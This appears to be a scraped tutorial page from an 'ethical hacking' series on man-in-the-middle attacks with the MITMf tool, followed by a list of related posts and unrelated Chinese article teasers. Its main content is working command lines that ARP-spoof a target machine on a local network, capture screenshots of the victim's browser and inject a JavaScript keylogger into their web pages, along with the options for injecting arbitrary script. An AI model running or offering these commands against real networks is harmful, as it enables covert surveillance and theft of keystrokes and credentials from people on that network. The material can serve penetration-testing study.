MITM - Capturing Screen Of Target & Injecting a Keylogger

ScreenShotter Plugin:

ScreenShotter:

  Uses HTML5 Canvas to render an accurate screenshot of a clients browser

  --screen              Load plugin 'ScreenShotter'

  --interval SECONDS    Interval at which screenshots will be taken (default 10 seconds)

Inject Plugin:

Inject:

  Inject arbitrary content into HTML content

  --inject              Load plugin 'Inject'

  --js-url JS_URL       URL of the JS to inject

  --js-payload JS_PAYLOAD

                        JS string to inject

  --js-file JS_FILE     File containing JS to inject

  --html-url HTML_URL   URL of the HTML to inject

  --html-payload HTML_PAYLOAD

                        HTML string to inject

  --html-file HTML_FILE

                        File containing HTML to inject

  --per-domain          Inject once per domain per client.

  --rate-limit RATE_LIMIT

                        Inject once every RATE_LIMIT seconds per client.

  --count-limit COUNT_LIMIT

                        Inject only COUNT_LIMIT times per client.

  --white-ips IP        Inject content ONLY for these ips (comma seperated)

  --black-ips IP        DO NOT inject content for these ips (comma seperated)

  --white-domains DOMAINS

                        Inject content ONLY for these domains (comma seperated)

  --black-domains DOMAINS

                        DO NOT inject content for these domains (comma seperated)

Test the ScreenShotter on Victim Windows PC.

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --screen

It works perfectly.

JSKeylogger Plugin:

JSKeylogger:

  Injects a javascript keylogger into clients webpages

  --jskeylogger         Load plugin 'JSKeylogger'

Usage:

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.22 -i eth0 --jskeylogger

It works...

Ethical Hacking - NETWORK PENETRATION TESTING(20)的更多相关文章

  1. Ethical Hacking - NETWORK PENETRATION TESTING(15)

    ARP Poisoning - arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of ...

  2. Ethical Hacking - NETWORK PENETRATION TESTING(22)

    MITM - Wireshark WIreshark is a network protocol analyser that is designed to help network administa ...

  3. Ethical Hacking - NETWORK PENETRATION TESTING(14)

    MITM - ARP Poisoning Theory Man In The Middle Attacks - ARP Poisoning This is one of the most danger ...

  4. Ethical Hacking - NETWORK PENETRATION TESTING(13)

    Nmap Nmap is a network discovery tool that can be used to gather detailed information about any clie ...

  5. Ethical Hacking - NETWORK PENETRATION TESTING(12)

    Post Connection Attacks Sophisticated attacks that can be used after connecting to the target AP. Ga ...

  6. Ethical Hacking - NETWORK PENETRATION TESTING(11)

    Securing your Network From the Above Attacks. Now that we know how to test the security of all known ...

  7. Ethical Hacking - NETWORK PENETRATION TESTING(10)

    WPA Craking WPA was designed to address the issues in WEP and provide better encryption. The main is ...

  8. Ethical Hacking - NETWORK PENETRATION TESTING(8)

    WEP Cracking Basic case Run airdump-ng to log all traffic from the target network. airodump-ng --cha ...

  9. Ethical Hacking - NETWORK PENETRATION TESTING(7)

    Gaining Access to encrypted networks Three main encryption types: 1. WEP 2.WPA 3.WPA2 WEP Cracking W ...

随机推荐

  1. 研为电子6轴运动控制卡win10驱动无法安装问题,解决方法

    研为电子6轴运动控制卡win10驱动无法安装问题,解决方法 研为电子6轴运动控制卡win10驱动无法安装问题,解决方法 iMC3xx2E系列运动控制卡使用手册V1.003 IMCdrv_Ins.exe ...

  2. spring源码分析——BeanPostProcessor接口

    BeanPostProcessor是处理bean的后置接口,beanDefinitionMaps中的BeanDefinition实例化完成后,完成populateBean,属性设置,完成 初始化后,这 ...

  3. 键盘侠Linux干货| 使用SSH方式推送文件至github仓库

    前言 作为一名优秀的计算机从业人员,相信大家github应该都知道吧.(优秀的代码托管工具) 但是由于平常使用的https方式克隆的本地仓库,每次git push时都需要输入帐号密码才能将我们修改的文 ...

  4. Netty源码分析之自定义编解码器

    在日常的网络开发当中,协议解析都是必须的工作内容,Netty中虽然内置了基于长度.分隔符的编解码器,但在大部分场景中我们使用的都是自定义协议,所以Netty提供了  MessageToByteEnco ...

  5. AOP的概念

    1.1 什么是AOP? 软件开发一直在寻求更加高效.更易维护甚至更易扩展的方式.软件开发的目的,最终是为了解决各种需求,包括业务需求和系统需求.使用面向对象方法,我们可以对业务需求等普通关注点进行很好 ...

  6. Spring Boot 系列

    https://www.cnblogs.com/magicalSam/p/7189421.html

  7. max depth exceeded when dereferencing c0-param0的问题

    在做项目的时候,用到了dwr,有一次居然报错,错误是max depth exceeded when dereferencing c0-param0 上网查了一下,我居然传参数的时候传的是object类 ...

  8. iframe 透明兼容,设置iframe透明背景的方法

    从IE5.5+就支持iframe框架的背景透明.通过使用allowtransparency和background-color来设置iframe框架的透明效果,代码如下: <iframe src= ...

  9. 你不知道的前端SDK开发技巧

    最近在做公司内部的一个的一个SDK的重构,这里总结一些经验分享给大家. 类型检查和智能提示 作为一个SDK,我们的目标是让使用者能够减少查看文档的时间,所以我们需要提供一些类型的检查和智能提示,一般我 ...

  10. innobackupex 数据库备份

    一,安装innobackupex CentOS: yum install percona-xtrabackup 二,备份数据 备份: innobackupex --user=user --passwo ...